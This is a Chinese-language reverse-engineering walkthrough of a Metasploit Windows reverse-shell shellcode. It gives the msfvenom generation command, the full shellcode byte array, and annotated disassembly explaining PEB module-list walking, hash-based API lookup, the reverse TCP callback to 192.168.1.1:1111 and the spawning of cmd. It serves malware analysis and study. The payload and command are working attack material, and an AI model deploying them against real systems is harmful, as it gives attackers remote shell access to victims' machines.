基本分析

生成指令:

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=1111 -f c

生成结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32"
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff"
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b"
"\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
"\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x01\x01\x68\x02"
"\x00\x04\x57\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5"
"\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01"
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5";

实际对应的汇编语言

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
.data:00404060                 cld
.data:00404061                 call    loc_4040E8
.data:00404066                 pusha
.data:00404067                 mov     ebp, esp
.data:00404069                 xor     eax, eax
.data:0040406B                 mov     edx, fs:[eax+30h]
.data:0040406F                 mov     edx, [edx+0Ch]
.data:00404072                 mov     edx, [edx+14h]
.data:00404075
.data:00404075 loc_404075:                             ; CODE XREF: uchar * buf+86↓j
.data:00404075                 mov     esi, [edx+28h]
.data:00404078                 movzx   ecx, word ptr [edx+26h]
.data:0040407C                 xor     edi, edi
.data:0040407E
.data:0040407E loc_40407E:                             ; CODE XREF: uchar * buf+2A↓j
.data:0040407E                 lodsb
.data:0040407F                 cmp     al, 61h ; 'a'
.data:00404081                 jl      short loc_404085
.data:00404083                 sub     al, 20h ; ' '
.data:00404085
.data:00404085 loc_404085:                             ; CODE XREF: uchar * buf+21↑j
.data:00404085                 ror     edi, 0Dh
.data:00404088                 add     edi, eax
.data:0040408A                 loop    loc_40407E
.data:0040408C                 push    edx
.data:0040408D                 push    edi
.data:0040408E                 mov     edx, [edx+10h]
.data:00404091                 mov     ecx, [edx+3Ch]
.data:00404094                 mov     ecx, [ecx+edx+78h]
.data:00404098                 jecxz   short loc_4040E2
.data:0040409A                 add     ecx, edx
.data:0040409C                 push    ecx
.data:0040409D                 mov     ebx, [ecx+20h]
.data:004040A0                 add     ebx, edx
.data:004040A2                 mov     ecx, [ecx+18h]
.data:004040A5
.data:004040A5 loc_4040A5:                             ; CODE XREF: uchar * buf+5F↓j
.data:004040A5                 jecxz   short loc_4040E1
.data:004040A7                 dec     ecx
.data:004040A8                 mov     esi, [ebx+ecx*4]
.data:004040AB                 add     esi, edx
.data:004040AD                 xor     edi, edi
.data:004040AF
.data:004040AF loc_4040AF:                             ; CODE XREF: uchar * buf+57↓j
.data:004040AF                 lodsb
.data:004040B0                 ror     edi, 0Dh
.data:004040B3                 add     edi, eax
.data:004040B5                 cmp     al, ah
.data:004040B7                 jnz     short loc_4040AF
.data:004040B9                 add     edi, [ebp-8]
.data:004040BC                 cmp     edi, [ebp+24h]
.data:004040BF                 jnz     short loc_4040A5
.data:004040C1                 pop     eax
.data:004040C2                 mov     ebx, [eax+24h]
.data:004040C5                 add     ebx, edx
.data:004040C7                 mov     cx, [ebx+ecx*2]
.data:004040CB                 mov     ebx, [eax+1Ch]
.data:004040CE                 add     ebx, edx
.data:004040D0                 mov     eax, [ebx+ecx*4]
.data:004040D3                 add     eax, edx
.data:004040D5                 mov     [esp+28h+var_4], eax
.data:004040D9                 pop     ebx
.data:004040DA                 pop     ebx
.data:004040DB                 popa
.data:004040DC                 pop     ecx
.data:004040DD                 pop     edx
.data:004040DE                 push    ecx
.data:004040DF                 jmp     eax
.data:004040E1 ; ---------------------------------------------------------------------------
.data:004040E1
.data:004040E1 loc_4040E1:                             ; CODE XREF: uchar * buf:loc_4040A5↑j
.data:004040E1                 pop     edi
.data:004040E2
.data:004040E2 loc_4040E2:                             ; CODE XREF: uchar * buf+38↑j
.data:004040E2                 pop     edi
.data:004040E3                 pop     edx
.data:004040E4                 mov     edx, [edx]
.data:004040E6                 jmp     short loc_404075
.data:004040E6 ?buf@@3PAEA     endp ; sp-analysis failed
.data:004040E6
.data:004040E8 ; ---------------------------------------------------------------------------
.data:004040E8
.data:004040E8 loc_4040E8:                             ; CODE XREF: uchar * buf+1↑p
.data:004040E8                 pop     ebp
.data:004040E9                 push    3233h
.data:004040EE                 push    5F327377h
.data:004040F3                 push    esp
.data:004040F4                 push    726774Ch
.data:004040F9                 call    ebp
.data:004040FB                 mov     eax, 190h
.data:00404100                 sub     esp, eax
.data:00404102                 push    esp
.data:00404103                 push    eax
.data:00404104                 push    6B8029h
.data:00404109                 call    ebp
.data:0040410B                 push    eax
.data:0040410C                 push    eax
.data:0040410D                 push    eax
.data:0040410E                 push    eax
.data:0040410F                 inc     eax
.data:00404110                 push    eax
.data:00404111                 inc     eax
.data:00404112                 push    eax
.data:00404113                 push    0E0DF0FEAh
.data:00404118                 call    ebp
.data:0040411A                 xchg    eax, edi
.data:0040411B                 push    5
.data:0040411D                 push    101A8C0h
.data:00404122                 push    57040002h
.data:00404127                 mov     esi, esp
.data:00404129
.data:00404129 loc_404129:                             ; CODE XREF: .data:0040413B↓j
.data:00404129                 push    10h
.data:0040412B                 push    esi
.data:0040412C                 push    edi
.data:0040412D                 push    6174A599h
.data:00404132                 call    ebp
.data:00404134                 test    eax, eax
.data:00404136                 jz      short loc_404144
.data:00404138                 dec     dword ptr [esi+8]
.data:0040413B                 jnz     short loc_404129
.data:0040413D                 push    56A2B5F0h
.data:00404142                 call    ebp
.data:00404144
.data:00404144 loc_404144:                             ; CODE XREF: .data:00404136↑j
.data:00404144                 push    646D63h
.data:00404149                 mov     ebx, esp
.data:0040414B                 push    edi
.data:0040414C                 push    edi
.data:0040414D                 push    edi
.data:0040414E                 xor     esi, esi
.data:00404150                 push    12h
.data:00404152                 pop     ecx
.data:00404153
.data:00404153 loc_404153:                             ; CODE XREF: .data:00404154↓j
.data:00404153                 push    esi
.data:00404154                 loop    loc_404153
.data:00404156                 mov     word ptr [esp+3Ch], 101h
.data:0040415D                 lea     eax, [esp+10h]
.data:00404161                 mov     byte ptr [eax], 44h ; 'D'
.data:00404164                 push    esp
.data:00404165                 push    eax
.data:00404166                 push    esi
.data:00404167                 push    esi
.data:00404168                 push    esi
.data:00404169                 inc     esi
.data:0040416A                 push    esi
.data:0040416B                 dec     esi
.data:0040416C                 push    esi
.data:0040416D                 push    esi
.data:0040416E                 push    ebx
.data:0040416F                 push    esi
.data:00404170                 push    863FCC79h
.data:00404175                 call    ebp
.data:00404177                 mov     eax, esp
.data:00404179                 dec     esi
.data:0040417A                 push    esi
.data:0040417B                 inc     esi
.data:0040417C                 push    dword ptr [eax]
.data:0040417E                 push    601D8708h
.data:00404183                 call    ebp
.data:00404185                 mov     ebx, 56A2B5F0h
.data:0040418A                 push    9DBD95A6h
.data:0040418F                 call    ebp
.data:00404191                 cmp     al, 6
.data:00404193                 jl      short loc_40419F
.data:00404195                 cmp     bl, 0E0h
.data:00404198                 jnz     short loc_40419F
.data:0040419A                 mov     ebx, 6F721347h
.data:0040419F
.data:0040419F loc_40419F:                             ; CODE XREF: .data:00404193↑j
.data:0040419F                                         ; .data:00404198↑j
.data:0040419F                 push    0
.data:004041A1                 push    ebx
.data:004041A2                 call    ebp

但是上述shellcode当中可能存在有将数据当中代码的情况,并且需要找出这个分析失败的原因

只需要更改出错的函数的大小就行

对应的反汇编

动态获取kernelbase

1
2
3
4
5
6
mov eax, dword ptr fs : [0x30]//此处偏移就是PEB位置
mov eax, dword ptr[eax+0xC]//模块列表LDR地址
mov eax, dword ptr[eax + 0x1C]//InInitializationOrderModuleList地址
mov eax, [eax]//使InInitializationOrderModuleList指向第二个元素,也就是该链表维护的第二个模块
mov eax,dword ptr[eax+0x8]//dllbase距离链表的距离
mov dwBase,eax//第一个模块就是kernel32也有可能是kernelbase实际上是第二个模块
InMemoryOrderModuleList 是一个 _LIST_ENTRY 结构,定义了进程加载的模块按内存顺序排列的链表。链表中的每个节点代表一个加载的模块(通常是DLL)

所以

+0x00c InLoadOrderModuleList : _LIST_ENTRY

+0x014 InMemoryOrderModuleList : _LIST_ENTRY

+0x01c InInitializationOrderModuleList : _LIST_ENTRY

都可以访问到加载模块基地址,只是排列顺序不同,所以偏移不一样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
0:000> !peb
PEB at 0024b000
    InheritedAddressSpace:    No
    ReadImageFileExecOptions: No
    BeingDebugged:            Yes
    ImageBaseAddress:         00ca0000
    NtGlobalFlag:             70
    NtGlobalFlag2:            0
    Ldr                       77f75d80
    Ldr.Initialized:          Yes
    Ldr.InInitializationOrderModuleList: 00583760 . 005857f0
    Ldr.InLoadOrderModuleList:           00583858 . 0058e620
    Ldr.InMemoryOrderModuleList:         00583860 . 0058e628
            Base TimeStamp                     Module
          ca0000 677e8efc Jan 08 22:43:08 2025 C:\Users\Aiyakami\Desktop\trust\shellcodeTest.exe
        77e50000 6ce0f861 Nov 20 11:56:17 2027 C:\WINDOWS\SYSTEM32\ntdll.dll
        76100000 C:\WINDOWS\System32\KERNEL32.DLL
        76300000 C:\WINDOWS\System32\KERNELBASE.dll
        6e880000 C:\WINDOWS\SYSTEM32\apphelp.dll
        75e60000 6763d3a2 Dec 19 16:04:50 2024 C:\WINDOWS\System32\ucrtbase.dll
        75cb0000 C:\WINDOWS\SYSTEM32\VCRUNTIME140.dll

InInitializationOrderModuleList:按模块初始化顺序排列的链表。

InLoadOrderModuleList:按模块加载顺序排列的链表。

InMemoryOrderModuleList:按模块在内存中加载顺序排列的链表。

上述dump中InLoadOrderModuleList,InInitializationOrderModuleList都还没有值是因为程序还没加载完成所以操作系统还没有值

1
2
3
4
5
.data:0040406B                 mov     edx, fs:[eax+30h]//进程环境块PEB位置
.data:0040406F                 mov     edx, [edx+0Ch]//模块列表(LDR)的地址
.data:00404072                 mov     edx, [edx+14h]//InMemoryOrderModuleList首模块(应该是进程自身)
.data:00404075                 mov     esi, [edx+28h]//BaseDllName#buffer字段  
.data:00404078                 movzx   ecx, word ptr [edx+26h]//BaseDllName#MaximumLength字段

对应的结构

整理的有点乱,上述是对于手动查找kernelbase的汇编代码进行研究,实际上的网上能找到的有多种不同的汇编代码都能实现,原因是可以分别通过下面三张表找到,用的表不同时,汇编代码就会有所不同:

InInitializationOrderModuleList:按模块初始化顺序排列的链表。

InLoadOrderModuleList:按模块加载顺序排列的链表。

InMemoryOrderModuleList:按模块在内存中加载顺序排列的链表。

直接XDBG中dump下来,其内容如下,除了动态获取kernelbase调用api的部分比较难理解,后续的建立TCP反向连接,和接收远程shellcode并分配内存执行就不深入研究了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
00CA4060 | FC                       | cld                                 
00CA4061 | E8 82000000              | call shellcodetest.CA40E8           


//通过hash值动态调用函数(此处算法需要改)
00CA4066 | 60                       | pushad                              
00CA4067 | 89E5                     | mov ebp,esp                         
00CA4069 | 31C0                     | xor eax,eax                         
00CA406B | 64:8B50 30               | mov edx,dword ptr fs:[eax+30]       
00CA406F | 8B52 0C                  | mov edx,dword ptr ds:[edx+C]        
00CA4072 | 8B52 14                  | mov edx,dword ptr ds:[edx+14]       
00CA4075 | 8B72 28                  | mov esi,dword ptr ds:[edx+28]      
00CA4078 | 0FB74A 26                | movzx ecx,word ptr ds:[edx+26]     
00CA407C | 31FF                     | xor edi,edi                        
00CA407E | AC                       | lodsb                              
00CA407F | 3C 61                    | cmp al,61                           
00CA4081 | 7C 02                    | jl shellcodetest.CA4085             
00CA4083 | 2C 20                    | sub al,20                           
00CA4085 | C1CF 0D                  | ror edi,D                           
00CA4088 | 01C7                     | add edi,eax                        
00CA408A | E2 F2                    | loop shellcodetest.CA407E           
00CA408C | 52                       | push edx                            
00CA408D | 57                       | push edi                            
00CA408E | 8B52 10                  | mov edx,dword ptr ds:[edx+10]      
00CA4091 | 8B4A 3C                  | mov ecx,dword ptr ds:[edx+3C]      
00CA4094 | 8B4C11 78                | mov ecx,dword ptr ds:[ecx+edx+78]   
00CA4098 | E3 48                    | jecxz shellcodetest.CA40E2          
00CA409A | 01D1                     | add ecx,edx                         
00CA409C | 51                       | push ecx                            
00CA409D | 8B59 20                  | mov ebx,dword ptr ds:[ecx+20]       
00CA40A0 | 01D3                     | add ebx,edx                         
00CA40A2 | 8B49 18                  | mov ecx,dword ptr ds:[ecx+18]       
00CA40A5 | E3 3A                    | jecxz shellcodetest.CA40E1          
00CA40A7 | 49                       | dec ecx                             
00CA40A8 | 8B348B                   | mov esi,dword ptr ds:[ebx+ecx*4]    
00CA40AB | 01D6                     | add esi,edx                        
00CA40AD | 31FF                     | xor edi,edi                        
00CA40AF | AC                       | lodsb                              
00CA40B0 | C1CF 0D                  | ror edi,D                           
00CA40B3 | 01C7                     | add edi,eax                         
00CA40B5 | 38E0                     | cmp al,ah                          
00CA40B7 | 75 F6                    | jne shellcodetest.CA40AF          
00CA40B9 | 037D F8                  | add edi,dword ptr ss:[ebp-8]       
00CA40BC | 3B7D 24                  | cmp edi,dword ptr ss:[ebp+24]      
00CA40BF | 75 E4                    | jne shellcodetest.CA40A5            
00CA40C1 | 58                       | pop eax                            
00CA40C2 | 8B58 24                  | mov ebx,dword ptr ds:[eax+24]      
00CA40C5 | 01D3                     | add ebx,edx                         
00CA40C7 | 66:8B0C4B                | mov cx,word ptr ds:[ebx+ecx*2]     
00CA40CB | 8B58 1C                  | mov ebx,dword ptr ds:[eax+1C]      
00CA40CE | 01D3                     | add ebx,edx                       
00CA40D0 | 8B048B                   | mov eax,dword ptr ds:[ebx+ecx*4]   
00CA40D3 | 01D0                     | add eax,edx                         
00CA40D5 | 894424 24                | mov dword ptr ss:[esp+24],eax      
00CA40D9 | 5B                       | pop ebx                            
00CA40DA | 5B                       | pop ebx                          
00CA40DB | 61                       | popad                              
00CA40DC | 59                       | pop ecx                            
00CA40DD | 5A                       | pop edx                            
00CA40DE | 51                       | push ecx                           
00CA40DF | FFE0                     | jmp eax                           
00CA40E1 | 5F                       | pop edi                            
00CA40E2 | 5F                       | pop edi                            
00CA40E3 | 5A                       | pop edx                            
00CA40E4 | 8B12                     | mov edx,dword ptr ds:[edx]        
00CA40E6 | EB 8D                    | jmp shellcodetest.CA4075          


//建立TCP反向连接  这一段中的call ebp就是call上面一个函数
00CA40E8 | 5D                       | pop ebp                           
00CA40E9 | 68 33320000              | push 3233                          
00CA40EE | 68 7773325F              | push 5F327377                     
00CA40F3 | 54                       | push esp                           
00CA40F4 | 68 4C772607              | push 726774C                      
00CA40F9 | FFD5                     | call ebp                          
00CA40FB | B8 90010000              | mov eax,190                         
00CA4100 | 29C4                     | sub esp,eax                         
00CA4102 | 54                       | push esp                           
00CA4103 | 50                       | push eax                            
00CA4104 | 68 29806B00              | push 6B8029                         
00CA4109 | FFD5                     | call ebp                           
00CA410B | 50                       | push eax                            
00CA410C | 50                       | push eax                           
00CA410D | 50                       | push eax                            
00CA410E | 50                       | push eax                            
00CA410F | 40                       | inc eax                             
00CA4110 | 50                       | push eax                            
00CA4111 | 40                       | inc eax                             
00CA4112 | 50                       | push eax                            
00CA4113 | 68 EA0FDFE0              | push E0DF0FEA                       
00CA4118 | FFD5                     | call ebp                           
00CA411A | 97                       | xchg edi,eax                       
00CA411B | 6A 05                    | push 5                              
00CA411D | 68 C0A80101              | push 101A8C0   主机ip地址                     
00CA4122 | 68 02000457              | push 57040002  主机端口号                     
00CA4127 | 89E6                     | mov esi,esp                         
00CA4129 | 6A 10                    | push 10                             
00CA412B | 56                       | push esi                            
00CA412C | 57                       | push edi                            
00CA412D | 68 99A57461              | push 6174A599                       
00CA4132 | FFD5                     | call ebp                            
00CA4134 | 85C0                     | test eax,eax                        
00CA4136 | 74 0C                    | je shellcodetest.CA4144             
00CA4138 | FF4E 08                  | dec dword ptr ds:[esi+8]           
00CA413B | 75 EC                    | jne shellcodetest.CA4129            
00CA413D | 68 F0B5A256              | push 56A2B5F0                       
00CA4142 | FFD5                     | call ebp                           


//如果连接成功 接收并执行命令
00CA4144 | 68 636D6400              | push 646D63                         
00CA4149 | 89E3                     | mov ebx,esp                         
00CA414B | 57                       | push edi                          
00CA414C | 57                       | push edi                           
00CA414D | 57                       | push edi                          
00CA414E | 31F6                     | xor esi,esi                       
00CA4150 | 6A 12                    | push 12                             
00CA4152 | 59                       | pop ecx                             
00CA4153 | 56                       | push esi                           
00CA4154 | E2 FD                    | loop shellcodetest.CA4153           
00CA4156 | 66:C74424 3C 0101        | mov word ptr ss:[esp+3C],101        
00CA415D | 8D4424 10                | lea eax,dword ptr ss:[esp+10]       
00CA4161 | C600 44                  | mov byte ptr ds:[eax],44           
00CA4164 | 54                       | push esp                            
00CA4165 | 50                       | push eax                            
00CA4166 | 56                       | push esi                         
00CA4167 | 56                       | push esi                          
00CA4168 | 56                       | push esi                           
00CA4169 | 46                       | inc esi                           
00CA416A | 56                       | push esi                          
00CA416B | 4E                       | dec esi                            
00CA416C | 56                       | push esi                          
00CA416D | 56                       | push esi                          
00CA416E | 53                       | push ebx                          
00CA416F | 56                       | push esi                          
00CA4170 | 68 79CC3F86              | push 863FCC79                       
00CA4175 | FFD5                     | call ebp                          
00CA4177 | 89E0                     | mov eax,esp                         
00CA4179 | 4E                       | dec esi                            
00CA417A | 56                       | push esi                           
00CA417B | 46                       | inc esi                           
00CA417C | FF30                     | push dword ptr ds:[eax]             
00CA417E | 68 08871D60              | push 601D8708                       
00CA4183 | FFD5                     | call ebp
backtop